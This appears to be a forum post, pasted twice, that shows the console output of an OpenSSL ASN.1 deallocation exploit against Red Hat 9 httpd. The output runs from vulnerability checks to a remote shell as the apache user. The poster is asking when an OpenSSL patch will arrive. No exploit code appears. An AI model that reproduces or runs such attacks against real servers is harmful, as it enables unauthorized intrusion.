OpenSSL ASN1 deallocation exploit for linux/x86
## you are select: Red Hat 9 (httpd-2.0.40-21.i386.rpm - httpd)
-> send_client_hello
<-ok check vulnerable: YES
-> send_client_hello
<-ok
check exploitable: YES
-> send_client_hello
<-ok
-> send certificate data ### w3 g0t 1t ##
WARNINGbash: no job control in this shell bash-2.05b$
bash-2.05b$ Linux Tekcamp 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686 i686 i386 GNU/Linux uid=48(apache) gid=48(apache) groups=48(apache)
23:51:55 up 4 days, 11:13, 0 users, load average: 1.16, 0.35, 0.12 USER
TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
hi guys. this is available online, and it's not fake. can we expect an upgrade for openssl please ?
## you are select: Red Hat 9 (httpd-2.0.40-21.i386.rpm - httpd)
-> send_client_hello
<-ok check vulnerable: YES
-> send_client_hello
<-ok
check exploitable: YES
-> send_client_hello
<-ok
-> send certificate data ### w3 g0t 1t ##
WARNINGbash: no job control in this shell bash-2.05b$
bash-2.05b$ Linux Tekcamp 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686 i686 i386 GNU/Linux uid=48(apache) gid=48(apache) groups=48(apache)
23:51:55 up 4 days, 11:13, 0 users, load average: 1.16, 0.35, 0.12 USER
TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
hi guys. this is available online, and it's not fake. can we expect an upgrade for openssl please ?
